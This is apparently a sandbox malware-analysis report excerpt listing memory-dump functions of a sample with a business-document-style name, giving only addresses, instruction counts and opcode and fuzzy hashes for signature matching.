Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea4479ac29b5e6dad745b0b52dc1ce472e3a401f7d9621a79d11c7d150da40c
Instruction ID: 5880c4d14c36fda2af1e2e523ca4c48f771c36115b5d89b453781a44c85e3671
Opcode Fuzzy Hash: 3ea4479ac29b5e6dad745b0b52dc1ce472e3a401f7d9621a79d11c7d150da40c
Instruction Fuzzy Hash: 6C213831A406148FC715DF68C99895A7BF6EF49725B1180AAE506DB3B2DB31EC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006177E0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a054e8b2915d77900470259701277263700947797c793f301f38ad2a2c80c14
Instruction ID: e8851ed4c2d8218b1f7d2c4a0eb82bb71bd29640cf72a06513e4d141dd71aa87
Opcode Fuzzy Hash: 0a054e8b2915d77900470259701277263700947797c793f301f38ad2a2c80c14
Instruction Fuzzy Hash: FE215030E082058FCB50EFA9E4493EEB7B3EB85300F18C076D41597745D7349A86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007DF280 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae35c7928e0d1cb087b94c1dbfaedfdc9a762a19178be42b6a74554264f2bfd
Instruction ID: a61ffa3dbb5172fd8768536ec5819efdb10e01e67adfad913785b673ac6aba22
Opcode Fuzzy Hash: fae35c7928e0d1cb087b94c1dbfaedfdc9a762a19178be42b6a74554264f2bfd
Instruction Fuzzy Hash: 41115E753042449FD324DF2DD888E56BBF9EF89314B15856BE44ACB752D734E806CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004F5CF7 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703a76e35aaf1d735091358b06384742ce1ff46309fb086ec798d3951ef5c929
Instruction ID: 5f216f4f2d647789468594c18b491a7ef7c204bb96628bc55b2153fbfd5baec2
Opcode Fuzzy Hash: 703a76e35aaf1d735091358b06384742ce1ff46309fb086ec798d3951ef5c929
Instruction Fuzzy Hash: 78219D70A00629CBDB24CB00C950BFEB7B1AF58700F5041CADB4AA7341CB749E81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 007DD5E0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4defbcad4b9e7f49beebf490d10ec83e37f92b9a0a5872671b2c4d18d546c1b
Instruction ID: 763aaa275e281303ad7c442b933dd68d3bc4a7ea018957beb23a0fe9e3267fd9
Opcode Fuzzy Hash: c4defbcad4b9e7f49beebf490d10ec83e37f92b9a0a5872671b2c4d18d546c1b
Instruction Fuzzy Hash: 87112532614120CFD7309BACE4557217BF4EB953E0B4A80D7D009CB356DA7ADC01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0061C541 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ab0ae9598345b25d7149dc47c5f808e8ad96791420d587bbb2e1c0e5f661fa
Instruction ID: a9e7a87b80aee538349067dc6a4c608939e8f828f303fd0305f5d4c3ff9542d3
Opcode Fuzzy Hash: 44ab0ae9598345b25d7149dc47c5f808e8ad96791420d587bbb2e1c0e5f661fa
Instruction Fuzzy Hash: CE113A728002499FDB10CF9AC844BEEBFF5EF88324F248419D458A7254C774AA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 000DD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.418364494.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_dd000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction ID: cf3a8abca47129dcce30e94567f628663297973de6f53fb0ffc05bbc52557333
Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction Fuzzy Hash: FF11AF76504740DFDB12CF14D9C4B16BFA1FB94314F24C6AAD8094B31AC33AD95ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0061FED0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d846c216419942455c873708b00c9b589c1ab929f6ad2da688a81fbc8327edb2
Instruction ID: 34f496189aee07dfada8afd946883245ac2405e8fdce7c4a2a4900683d23560a
Opcode Fuzzy Hash: d846c216419942455c873708b00c9b589c1ab929f6ad2da688a81fbc8327edb2
Instruction Fuzzy Hash: 9C118EB1A042008FDB049F54D8857AA7BA2FFC8301F24C879D5499F286DBB1D946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00616FD0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e2a6ed7b046c122e0021e3a70e2139dfd96c2548b4c1dce06115b565226ca7
Instruction ID: 08f42da6cd7ee1506f07a25ece37b4bbef7c40c7e6ad43972221b8da91304646
Opcode Fuzzy Hash: b2e2a6ed7b046c122e0021e3a70e2139dfd96c2548b4c1dce06115b565226ca7
Instruction Fuzzy Hash: 8F119E357092148BD714AF66F4087FA72A3EBC8712F28C062E80547799CB34ADC78BC1

Uniqueness

Uniqueness Score: -1.00%

Function 006025E9 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbee13f44bf347289a4626474b455bf826be3c009962076d6cafa4de2395e959
Instruction ID: a62c7a4d266c26a62c47ebe1453268651538672c11dd52b9973f583b192b189e
Opcode Fuzzy Hash: cbee13f44bf347289a4626474b455bf826be3c009962076d6cafa4de2395e959
Instruction Fuzzy Hash: 59215078A52219AFDB08DF58D598AADB7B2BF49300F604059F805AB3A1CB35AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004F5D77 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b7b5155229b6d5ac260c71ce3743b50a1bc8b64cd062cb874e0315ce23dfa3
Instruction ID: 409c77bed43ef8c5a221b8f44409084785cf5e247dd53e52e452c78d028188ce
Opcode Fuzzy Hash: 11b7b5155229b6d5ac260c71ce3743b50a1bc8b64cd062cb874e0315ce23dfa3
Instruction Fuzzy Hash: 6D21AC30A00629CBEB24CB10C950BFEB7B1AF58700F6041CADB4AA7741CBB49E81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0061C548 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b147803aaedd7b96910333a0900cef03f44c4c340967b42837b7c27b86390fa4
Instruction ID: 09be3cbf7bbef76d9e82376439cc8f89d2830dc64c36103a04bf4f83efda17e6
Opcode Fuzzy Hash: b147803aaedd7b96910333a0900cef03f44c4c340967b42837b7c27b86390fa4
Instruction Fuzzy Hash: 1B1149728002099FDB10CF9AC844BEEFFF5EF88324F248819D458A7254C778AA54DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0061FED8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ea1a1b7c0a829d88abec49bfdcba9a1190c055b66dcdaa3c73ebfc669c7086
Instruction ID: 6a95988be5b3cac844dcdb08c91fb16097c2ccf06972860aae3fab9ab1389d0f
Opcode Fuzzy Hash: 41ea1a1b7c0a829d88abec49bfdcba9a1190c055b66dcdaa3c73ebfc669c7086
Instruction Fuzzy Hash: 9C01C4B1A043008FDB049F55D84579A7BA6FFC8300F24C879D54D9F385DBB1D9468BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00605A98 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cdef296b33bcbf4f8fe31f728af040b19eb98b5b44402a67574b7548099976a
Instruction ID: 921bdf2be85d7242d5b8c22ba43ae3913254b5e4bd0bebaf5f01ca4876448f63
Opcode Fuzzy Hash: 1cdef296b33bcbf4f8fe31f728af040b19eb98b5b44402a67574b7548099976a
Instruction Fuzzy Hash: 00F0925218F3D22FC70387B56C754C5BFB4AD5322131A4ADBD9C8CA4A3C65C099BD762

Uniqueness

Uniqueness Score: -1.00%

Function 00603E30 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8106f21d59d22defb8b969efe9e3c0247b3237578f0fbff8a5b67521584fe30d
Instruction ID: c410c9e71b6dc95e327fc1219067d47051ff61b4891aa04598e1fbb98bc238b7
Opcode Fuzzy Hash: 8106f21d59d22defb8b969efe9e3c0247b3237578f0fbff8a5b67521584fe30d
Instruction Fuzzy Hash: 140192336042686FD758DA99D040BEBFFEAEB55321F2481ABE484C7391D631EE80C750

Uniqueness

Uniqueness Score: -1.00%

Function 04EFF740 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2160290d21683ada9ecdcf339b9d585893475c71197d7692bfb2422d7a631c4a
Instruction ID: c90581a1c86158b1b03e079f72f40e45a242a7d81e4693ac32c8079d9af08a1a
Opcode Fuzzy Hash: 2160290d21683ada9ecdcf339b9d585893475c71197d7692bfb2422d7a631c4a
Instruction Fuzzy Hash: AB01B531704A158BE3149A5AAC45B6BF2E7EFC8716F248036E20D87394EB71BC428690

Uniqueness

Uniqueness Score: -1.00%

Function 006024C8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868ff082336fca73c1370dd0bbedab38123ed9a1152cf25b090a9fc71643aba2
Instruction ID: d1c4019c7bf5ebc521efaf166917fee11b0b2a0e355f0cf6b3325b14a1948c34
Opcode Fuzzy Hash: 868ff082336fca73c1370dd0bbedab38123ed9a1152cf25b090a9fc71643aba2
Instruction Fuzzy Hash: C0018436340215AFDB148F59DC94FABBBAAEFD9721F10802AFA04CB290C6B1D9059750

Uniqueness

Uniqueness Score: -1.00%

Function 004F5E05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed4bf4cffde7e313681c8a59ee20f074be2d27a9350b40a196ba1178dd48b75
Instruction ID: 6a3a212ccb8d195dfb29047baa05b9d3d66b132b283c8640058077541abd86e3
Opcode Fuzzy Hash: 3ed4bf4cffde7e313681c8a59ee20f074be2d27a9350b40a196ba1178dd48b75
Instruction Fuzzy Hash: A4116A30A00629CBEB20DB10C950BFEB7B2AF58700F6041DADA49A7751DBB49E81DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0061A582 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f8b9bc3472d4999fd06ae11121af02ed774c7f6b4579f96ce5694ea4a228b8
Instruction ID: fa287950f011218b4eec8b303e36028a934bbcaa8f50b9ebd8bc7086fc65a172
Opcode Fuzzy Hash: 52f8b9bc3472d4999fd06ae11121af02ed774c7f6b4579f96ce5694ea4a228b8
Instruction Fuzzy Hash: 4A112174B0A104DFC714DF94E144BBDB7B3AB88300F698156E8059B355CB34ED86DB86

Uniqueness

Uniqueness Score: -1.00%

Function 007DE328 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6240d61307e65c016b8dc3241ef748481be19a98eb6def4312b4f7e2e029a7
Instruction ID: 85d5cf9d57286f00dd17a3bdeba92e1f2db68b2889303720931f029e9bce5fa0
Opcode Fuzzy Hash: 8a6240d61307e65c016b8dc3241ef748481be19a98eb6def4312b4f7e2e029a7
Instruction Fuzzy Hash: 430162353002005FD710EF5DD854A2ABBF6EF8D361714846AE989CB751DB35EC01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0061F6A8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3741fd6fa5e093c2ff7f3cd0744d775341742e4923fc0aad3fd8f0f2bc33fb
Instruction ID: b2f6323cd601c31af30aaaaee2a6386d98f0078b7f6bda14db760992bc0fba60
Opcode Fuzzy Hash: 2b3741fd6fa5e093c2ff7f3cd0744d775341742e4923fc0aad3fd8f0f2bc33fb
Instruction Fuzzy Hash: 6A01D635608204AFD7018B58D850BEA7BA6EB98375F088066FC0C9B391C635DD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0061DCB4 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3f2f60c2573f0baef389296c7d4098c02860154f6d2f09c8595cfd0f129505
Instruction ID: 5897e8b0d3bcabbe0c4f92faad0d802659d603dac8dbc30194fe9c78e5ff058c
Opcode Fuzzy Hash: 4d3f2f60c2573f0baef389296c7d4098c02860154f6d2f09c8595cfd0f129505
Instruction Fuzzy Hash: EF115A30A01116CFEB258F25DC18BED7BB2AB88305F18825AD81AD3761CB359AC1CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0060D8A4 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81eb84a22fc231dc9f680dc09aa9758cf601dc2d61e456ce31ce20695e7e013d
Instruction ID: 484a53e4822ec3d665d46cb252ddb0b5b0bdb181a240a1b4b473695cd4fbd365
Opcode Fuzzy Hash: 81eb84a22fc231dc9f680dc09aa9758cf601dc2d61e456ce31ce20695e7e013d
Instruction Fuzzy Hash: 2A115E71940229CFCB28DB98C945BEA7BB7EF4D310F154286E509AB3A1C7709D41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00617E98 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c470bbfce3066abd1f527bbc7ef41a8b6371355b1cc88ffe3421d33bf61069
Instruction ID: c4ee3926de8191689441459e1b563ba5f235b419bcbfab39ce5376b8e8c3e4fa
Opcode Fuzzy Hash: b4c470bbfce3066abd1f527bbc7ef41a8b6371355b1cc88ffe3421d33bf61069
Instruction Fuzzy Hash: FB017131600214DBDB255F65C8186EEBBF7EF8D711F14846AE802A7390CF754E46DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060B9F2 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71fe4537f4f21380a9404a45d29d6e10dde87e46f7799274068f8bb134ffd4c
Instruction ID: c9c461a6830a448bab3e31a6c2501fec3fe8774c7a21ad514a7b8ac78a7106b6
Opcode Fuzzy Hash: e71fe4537f4f21380a9404a45d29d6e10dde87e46f7799274068f8bb134ffd4c
Instruction Fuzzy Hash: 1BF06D6138E3D14FC7164A687C704A9AFB5DF87A2079A45FBE884CB2A3C5584C4A8362

Uniqueness

Uniqueness Score: -1.00%

Function 0060EF68 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b745b6274a6ff20288b663d4b576dd3683903590d6dff12071188318d81de80
Instruction ID: 4ef093eeb1482083b8c464fb54fe3a6f84fe91ffc0d97911c4662d7a335501fa
Opcode Fuzzy Hash: 7b745b6274a6ff20288b663d4b576dd3683903590d6dff12071188318d81de80
Instruction Fuzzy Hash: 8B01B1353056108FC31A9B64E828A6E7BA2AF8A311F10856BE546CB3E1CF35DC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0061A743 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3b736f30b4bce88ea29b56f37ca3b88ffa45e837fd9f0ecb31cb8abcdc07be
Instruction ID: 9ba61bdc6c58a5bd94f180a638e199c4444962494d21e40791abd1e0a25a0968
Opcode Fuzzy Hash: 4c3b736f30b4bce88ea29b56f37ca3b88ffa45e837fd9f0ecb31cb8abcdc07be
Instruction Fuzzy Hash: 5F115E70A0A204DFD708DF94D044BFDB7B3AB84301F698295D8015B35ACB34EE86DB86

Uniqueness

Uniqueness Score: -1.00%

Function 00604000 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7cece38e4944c75c31ac16669f83010e7e89a85e6a0c7074d9cd619fa7389c4
Instruction ID: 6209d7b79161f17cb6207b07579c6a9863fe153a20e001800c1910c4bd657d43
Opcode Fuzzy Hash: e7cece38e4944c75c31ac16669f83010e7e89a85e6a0c7074d9cd619fa7389c4
Instruction Fuzzy Hash: 2EF0C8713400124FC714DB19D490AAAF7D7FFC9610B24807AE705CB3A6CE35DC029790

Uniqueness

Uniqueness Score: -1.00%

Function 006018E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7880ae954314fc80c1b0cc7e3c9142d5d8a231d4db6bf41a4b2e087ab88e49da
Instruction ID: 50685efad1ff442e26a47a7a03e7b927110f62a0867ed46f32e7beffb545e1f6
Opcode Fuzzy Hash: 7880ae954314fc80c1b0cc7e3c9142d5d8a231d4db6bf41a4b2e087ab88e49da
Instruction Fuzzy Hash: 37F0CD31B4D3515FE31587245824767BFA59F87310F1981A6D549DF3E2C665DC41C390

Uniqueness

Uniqueness Score: -1.00%

Function 0060C200 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acd6629b48d2910df74dd972d38541b96711fefdd8192d4bb5db7998541ffc48
Instruction ID: 966f1258b521af4b9e06c8c35eaa44247f8f3fa5f753ea25827c574dd8f2f548
Opcode Fuzzy Hash: acd6629b48d2910df74dd972d38541b96711fefdd8192d4bb5db7998541ffc48
Instruction Fuzzy Hash: F6F046327001086FCB188B68D8D49EAF7AAEF88330F00812AF904C73A1CB749D07C790

Uniqueness

Uniqueness Score: -1.00%

Function 007DFF70 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0473d3c844f804b839423816decf1067c921af12c9367247b7a128ae4beb43
Instruction ID: a4b7c9be53a661f939488120bfab6d16da403989ebea1d0ee8774d41d0f836ab
Opcode Fuzzy Hash: 4c0473d3c844f804b839423816decf1067c921af12c9367247b7a128ae4beb43
Instruction Fuzzy Hash: 34F0B4313001158B8B59B779545852E76E6DBD9660328043BF10BCF391DD29CC028392

Uniqueness

Uniqueness Score: -1.00%

Function 04EE125B Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 305cdcddae98c14190519deefccf18162a17bc3f7e410aee1a7533098c99454c
Instruction ID: d173f1fed81690c2b729dc2a3a3e6e578ea8c91a21eebb19f0736bb26b72b558
Opcode Fuzzy Hash: 305cdcddae98c14190519deefccf18162a17bc3f7e410aee1a7533098c99454c
Instruction Fuzzy Hash: 1D112A38E043248FCB51DF59D8487EAB7B1EB89300F4081EAD84EA7355DA346E84DF81

Uniqueness

Uniqueness Score: -1.00%

Function 0061A7B7 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 757e291cabc9e78250b64c429f98e460d9bb9c2d1532522a621bedddb928ad4d
Instruction ID: 3710c4299781a541f7d05a4cb05cd5eb6db4ed2e0424ee8bedcc353f78db9856
Opcode Fuzzy Hash: 757e291cabc9e78250b64c429f98e460d9bb9c2d1532522a621bedddb928ad4d
Instruction Fuzzy Hash: 0601407070A244DFD714DF94E0447FDB7B3AB84305F688155D8055B359C778EE869B82

Uniqueness

Uniqueness Score: -1.00%

Function 00604008 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5bb3ff8042447cf20cee7739308b87b0df1895ea70620f32447d132500cdb6
Instruction ID: 120a11dddc0df45e9469a1689f7d34da2ff806a9073663b41d05570a698b3add
Opcode Fuzzy Hash: 2d5bb3ff8042447cf20cee7739308b87b0df1895ea70620f32447d132500cdb6
Instruction Fuzzy Hash: 65F0C2303000118FC714DA19D890A6AF7D7FFC8610B248075E70ACB366CE21EC0197D0

Uniqueness

Uniqueness Score: -1.00%

Function 007D4044 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

